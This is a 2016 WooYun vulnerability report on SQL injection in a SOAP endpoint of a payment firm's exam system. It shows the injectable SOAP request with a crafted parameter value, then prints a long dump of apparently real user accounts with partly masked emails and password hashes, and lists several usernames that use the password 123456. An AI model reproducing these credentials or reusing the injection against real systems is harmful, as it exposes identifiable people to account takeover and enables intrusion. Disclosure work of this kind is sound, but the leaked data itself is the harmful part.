某大型第三方支付机构考试系统SOAP注入涉及用户密码(DBA权限+9库)

编号221978
Urlhttp://www.wooyun.org/bug.php?action=view&id=221978
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题某大型第三方支付机构考试系统SOAP注入涉及用户密码(DBA权限+9库)
漏洞类型SQL注射漏洞
厂商银联商务
白帽子0x 80
提交日期2016-06-23 10:41:00
公开日期2016-06-27 15:05:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签数据库账户权限过高 Mysql 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank0
漏洞简介
某大型第三方支付机构考试系统SOAP注入涉及用户密码(DBA权限+9库)
漏洞细节

http://**.**.**.**/webservice/MuiltiExam.asmx?op=DeleteSendedKscj
http://**.**.**.**/webservice/MuiltiExam.asmx?wsdl
SOAP接口存在注入

捕获881.GIF


捕获88888.GIF


POST /webservice/MuiltiExam.asmx HTTP/1.1
Host: **.**.**.**
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://**.**.**.**/DeleteSendedKscj"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema" xmlns:soap="http://**.**.**.**/soap/envelope/">
<soap:Body>
<DeleteSendedKscj xmlns="http://**.**.**.**/">
<p_KscjIDList>'having</p_KscjIDList>
</DeleteSendedKscj>
</soap:Body>
</soap:Envelope>


捕获789.GIF


经过查找,发现,用户密码都保存在StudentInfo里
果断列出
一共700条记录

捕获99999.GIF


lixiumei      | <blank>                | <blank> | 479E285A022B9CB4
|
liyang | <blank> | <blank> | 479E285A022B9CB4
|
liyongcheng | <blank> | <blank> | 479E285A022B9CB4
|
liyue | <blank> | <blank> | 479E285A022B9CB4
|
lizhao | <blank> | <blank> | 479E285A022B9CB4
|
lizhong | <blank> | <blank> | 479E285A022B9CB4
|
ljbai | <blank> | <blank> | 479E285A022B9CB4
|
ljzeng | <blank> | <blank> | 479E285A022B9CB4
|
llgeng | <blank> | <blank> | 479E285A022B9CB4
|
lluo | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
lmhao | <blank> | <blank> | 58AC395097A22F72
|
lnzhao | <blank> | <blank> | 54F97C5672F5BE01
|
lpeng | <blank> | <blank> | 3958D708ABBD18F5829A484A3
C3D6 |
lpyu | <blank> | <blank> | C09FF02294F9E52F
|
lsun | <blank> | <blank> | 479E285A022B9CB4
|
lswan | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
luhanliang | <blank> | <blank> | 1B5291DD16A01F1E39895E885
2807 |
lujun | <blank> | <blank> | 479E285A022B9CB4
|
luomeiguang | <blank> | <blank> | 479E285A022B9CB4
|
luowei | <blank> | <blank> | 479E285A022B9CB4
|
lupeng | <blank> | <blank> | 479E285A022B9CB4
|
luyang1 | <blank> | <blank> | 82A9983FEE532426
|
lwan | <blank> | <blank> | 0DF27AD1616400C165B0327FB
87E9 |
lwliu | <blank> | <blank> | 479E285A022B9CB4
|
lwzhou | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
lyang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
lyfan | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
lysun | <blank> | <blank> | 479E285A022B9CB4
|
lyzheng | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
lzhao | <blank> | <blank> | 479E285A022B9CB4
|
lzmeng | <blank> | <blank> | 479E285A022B9CB4
|
make | <blank> | <blank> | 479E285A022B9CB4
|
mayan | <blank> | <blank> | B7330939422D9E2E
|
mchang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
mengxu | <blank> | <blank> | 4545A5EA2CF35C0A
|
miaolu | <blank> | <blank> | 243234EA86D7766A
|
mli | <blank> | <blank> | 13C32499F222FDAF
|
mlkang | <blank> | <blank> | 479E285A022B9CB4
|
morigen | <blank> | <blank> | 479E285A022B9CB4
|
mqzhu | [email protected]**.**.**.** | <blank> | 243234EA86D7766A
|
mrg | <blank> | <blank> | CEF5109E98B16D0D
|
mtan | <blank> | <blank> | 479E285A022B9CB4
|
mxzhou | <blank> | <blank> | 479E285A022B9CB4
|
myfan | <blank> | <blank> | AE6034BD0094EFC3
|
myliu | <blank> | <blank> | 221F814559A2B711
|
mzhang | <blank> | <blank> | 243234EA86D7766A
|
nanma | <blank> | <blank> | 479E285A022B9CB4
|
ningli | <blank> | <blank> | 479E285A022B9CB4
|
nma | <blank> | <blank> | B0D948EC1D8CEFE5
|
nrmu | <blank> | <blank> | 479E285A022B9CB4
|
pangqingyuan | <blank> | <blank> | 479E285A022B9CB4
|
panxingyu | <blank> | <blank> | 479E285A022B9CB4
|
pbwei | <blank> | <blank> | 479E285A022B9CB4
|
pcli | [email protected]**.**.**.** | <blank> | 770F3B8CF538FE46
|
pengc | <blank> | <blank> | 479E285A022B9CB4
|
pengzhao | <blank> | <blank> | 479E285A022B9CB4
|
pengzhou | <blank> | <blank> | 479E285A022B9CB4
|
phu | <blank> | <blank> | 479E285A022B9CB4
|
phuang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
phxia | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
phzhao | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
pingjuan | <blank> | <blank> | 479E285A022B9CB4
|
pingliu | <blank> | <blank> | 479E285A022B9CB4
|
pmwang | <blank> | <blank> | CA4B423E67EF6530D50CE8E49
7D88 |
pzhou1 | <blank> | <blank> | 243234EA86D7766A
|
qianwu | <blank> | <blank> | 479E285A022B9CB4
|
qichen | <blank> | <blank> | 479E285A022B9CB4
|
qjli | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
qlzhao | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
qniu | <blank> | <blank> | 479E285A022B9CB4
|
qniu1 | <blank> | <blank> | B0D948EC1D8CEFE5
|
qptang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
qqliu | <blank> | <blank> | E02903083F8CFCA3
|
qrzhu | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
qydu | <blank> | <blank> | EA3E5F6FF633D599
|
qzhang | <blank> | <blank> | 479E285A022B9CB4
|
renyao | <blank> | <blank> | 479E285A022B9CB4
|
rfchen | <blank> | <blank> | 479E285A022B9CB4
|
rppang | <blank> | <blank> | 34CD945D82FB6E84
|
rrzhou | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
rtang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
rtzong | <blank> | <blank> | 479E285A022B9CB4
|
ruanrongheng | <blank> | <blank> | 479E285A022B9CB4
|
ruili | <blank> | <blank> | 479E285A022B9CB4
|
ruizhang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
rxhe | <blank> | <blank> | 479E285A022B9CB4
|
rzhang | <blank> | <blank> | 479E285A022B9CB4
|
rztang | <blank> | <blank> | 479E285A022B9CB4
|
sbhan | <blank> | <blank> | 479E285A022B9CB4
|
schao | <blank> | <blank> | 479E285A022B9CB4
|
sgjia | <blank> | <blank> | 479E285A022B9CB4
|
sgma | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
shijun | <blank> | <blank> | 479E285A022B9CB4
|
shilan | <blank> | <blank> | 479E285A022B9CB4
|
shuang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
shwang1 | <blank> | <blank> | E2BA32BC495A9ECB
|
shxu | <blank> | <blank> | 243234EA86D7766A
|
spzhu | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
sqjy | <blank> | <blank> | 479E285A022B9CB4
|
sqliang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
sshan | <blank> | <blank> | CEF5109E98B16D0D
|
stchen | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
stgao | <blank> | <blank> | 479E285A022B9CB4
|
sujing | <blank> | <blank> | 479E285A022B9CB4
|
sunchangming | <blank> | <blank> | 479E285A022B9CB4
|
suyoumei | <blank> | <blank> | 479E285A022B9CB4
|
swu | <blank> | <blank> | 243234EA86D7766A
|
swzhang | <blank> | <blank> | 479E285A022B9CB4
|
sxdeng | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
syang | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
syfeng | <blank> | <blank> | 479E285A022B9CB4
|
szyao | <blank> | <blank> | 479E285A022B9CB4
|
tangxianan | <blank> | <blank> | 243234EA86D7766A
|
taohe | <blank> | <blank> | 479E285A022B9CB4
|
tdai | <blank> | <blank> | 479E285A022B9CB4
|
terigen | <blank> | <blank> | 479E285A022B9CB4
|
tingma | <blank> | <blank> | 479E285A022B9CB4
|
tingzhang | <blank> | <blank> | 479E285A022B9CB4
|
tjliu | [email protected]**.**.**.** | <blank> | 479E285A022B9CB4
|
tongjun | <blank> | <blank> | 243234EA86D7766A
|
tongyonggang | <blank> | <blank> | 243234EA86D7766A
|
ttxiao | <blank> | <blank> | 479E285A022B9CB4
|
ttxu | <blank> | <blank> | A7B4C13DF4AD0906F56534972
FCA3 |
tzhang | <blank> | <blank> | 101C34ABEE10A006
|
wangbin | <blank> | <blank> | 479E285A022B9CB4
|
wangchangcai | <blank> | <blank> | 479E285A022B9CB4
|
wangchen | <blank> | <blank> | 479E285A022B9CB4
|
wangcheng | <blank> | <blank> | 479E285A022B9CB4
|
wanggang | <blank> | <blank> | 479E285A022B9CB4
|
wanggang1 | <blank> | <blank> | 479E285A022B9CB4
|
wangguogao | <blank> | <blank> | 479E285A022B9CB4
|
wanghao | <blank> | <blank> | E4DE688C2DC86CB7
|
wangheyou | <blank> | <blank> | 479E285A022B9CB4
|
wangkanglang | <blank> | <blank> | 243234EA86D7766A
|
wangkun | <blank> | <blank> | 479E285A022B9CB4


虽然密码已被加密
但还是存在很多弱口令
http://**.**.**.**/Login.aspx
随便列举
jwang1 123456
chzhang 123456
cshhan 123456
daijianbei 123456
heli 123456

捕获111.GIF


捕获98989.GIF


POC

http://**.**.**.**/webservice/MuiltiExam.asmx?wsdl

修复方案

状态信息 2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-27: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-27 15:05